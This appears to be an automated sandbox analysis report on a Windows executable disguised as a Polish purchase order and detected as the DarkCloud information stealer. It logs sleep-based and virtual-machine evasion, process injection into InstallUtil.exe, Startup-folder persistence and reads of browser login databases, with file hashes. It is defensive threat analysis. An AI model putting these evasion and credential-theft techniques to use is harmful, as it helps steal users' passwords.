Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -98625s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -98516s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -98391s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -98281s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -98172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -98062s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -97953s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -97844s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -97734s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -97625s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -97516s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -97403s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -97281s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -97172s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -97057s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -96891s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -96578s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -96447s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -96328s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -96219s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -96094s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -95984s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -95875s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -95766s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe TID: 5944	Thread sleep time: -95656s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 99875	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 99765	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 99651	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 99547	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 99422	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 99312	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 99203	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 99093	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 98984	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 98875	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 98761	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 98613	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 98499	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 98361	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 98178	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 98000	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 97890	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 97781	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 97667	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 97562	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 97453	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 97343	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 97234	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 97125	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 97015	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 96906	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 96796	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 96687	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 96578	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 96468	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 96359	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 96250	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 96140	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 96031	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 95919	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Thread delayed: delay time: 95812	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 99860	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 99735	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 99406	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 99297	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 99188	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 99063	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 98953	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 98843	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 98734	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 98625	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 98516	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 98391	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 98281	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 98172	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 98062	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 97953	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 97844	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 97734	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 97625	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 97516	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 97403	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 97281	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 97172	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 97057	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 96891	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 96578	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 96447	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 96328	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 96219	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 96094	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 95984	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 95875	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 95766	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Thread delayed: delay time: 95656	Jump to behavior

Source: WebData.2.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: WebData.2.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: WebData.2.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: WebData.2.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: WebData.2.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: WebData.2.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: InstallUtil.exe, 00000002.00000002.3305635075.0000000000A97000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.3306426620.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3306652645.0000000000D17000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3305781323.0000000000CF1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000005.00000002.2231461639.0000017F4AC12000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: InstallUtil.exe, 00000007.00000002.3306652645.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBn
Source: WebData.2.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: WebData.2.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: WebData.2.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: WebData.2.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: WebData.2.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: WebData.2.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: WebData.2.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: WebData.2.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: WebData.2.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2111378125.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, FieldNames.exe, 00000006.00000002.2286664528.000000000119C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: WebData.2.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: WebData.2.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: WebData.2.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: WebData.2.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: WebData.2.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: WebData.2.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: WebData.2.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: WebData.2.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: WebData.2.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: WebData.2.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: WebData.2.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: WebData.2.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: FieldNames.exe, 00000006.00000002.2288985162.0000000002E9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: WebData.2.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: FieldNames.exe, 00000006.00000002.2288985162.0000000002E9C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: model0Microsoft\|VMWare\|Virtual
Source: WebData.2.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: WebData.2.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: WebData.2.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Process information queried: ProcessInformation

Jump to behavior

Enables debug privileges

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Memory allocated: page read and write | page guard

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Roaming\FieldNames.exe "C:\Users\user\AppData\Roaming\FieldNames.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Queries volume information: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Queries volume information: C:\Users\user\AppData\Roaming\FieldNames.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\FieldNames.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected DarkCloud

Source: Yara match	File source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3304177579.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2306805654.0000000004018000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2118042555.000000000412F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2118042555.0000000004227000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe PID: 5760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FieldNames.exe PID: 1272, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7108, type: MEMORYSTR

Yara detected Generic Dropper

Source: Yara match	File source: Process Memory Space: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe PID: 5760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FieldNames.exe PID: 1272, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Remote Access Functionality

Yara detected DarkCloud

Source: Yara match	File source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe.41695f0.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3304177579.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2306805654.0000000004018000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2118042555.000000000412F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2118042555.0000000004227000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe PID: 5760, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: FieldNames.exe PID: 1272, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 7108, type: MEMORYSTR

ID:	1541129
Product:	CloudBasic
Start time:	13:39:13
Start date:	24.10.2024
Sample:	PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	934ab81ba50dcd526fee8d8efbb7a216
SHA1:	7e2e6ab92ba2f6158db445daf27df591ae9744bd
SHA256:	11d1a478267e0ab5df63bcadadae555c683c94e66df9de87084407c48d439519
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Roaming\FieldNames.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	934AB81BA50DCD526FEE8D8EFBB7A216	7E2E6AB92BA2F6158DB445DAF27DF591AE9744BD	11D1A478267E0AB5DF63BCADADAE555C683C94E66DF9DE87084407C48D439519
C:\Users\user\AppData\Roaming\FieldNames.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FieldNames.vbs	ASCII text, with no line terminators	11CCF2C03461BFFF10B6DB47827F5660	729C0BE0CE22C77B369FE938F0CDF6A09F7B3C01	6C34959723D5AD4B3C33F021E7D8ECCA4732F113A488FEF3B4B48BDF78FC6707
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\LogfirebirdULzauCAPrOnmUabaculus	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\WebData	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8	D87270D0039ED3A5A72E7082EA71E305	0FBACFA8029B11A5379703ABE7B392C4E46F0BD2	F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA

Windows Analysis Report
PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2123399550.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.00000000030AC000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000000.2054917962.0000000000C78000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameNsrnqjr.exe0 vs PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.000000000342B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2112093538.000000000342B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNsrnqjr.exe0 vs PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.000000000412F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamebolewort.exe vs PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.0000000004227000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamebolewort.exe vs PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.0000000004227000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameLwmonhiauc.dll" vs PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.0000000004068000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000047E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2124472344.0000000006FD0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2118042555.00000000045DF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2111378125.000000000116E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe, 00000000.00000002.2122259348.00000000069C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameLwmonhiauc.dll" vs PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe
Source: PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe	Binary or memory string: OriginalFilenameNsrnqjr.exe0 vs PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Windows Analysis Report PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe

Overview

General Information

Detection

Signatures

Classification

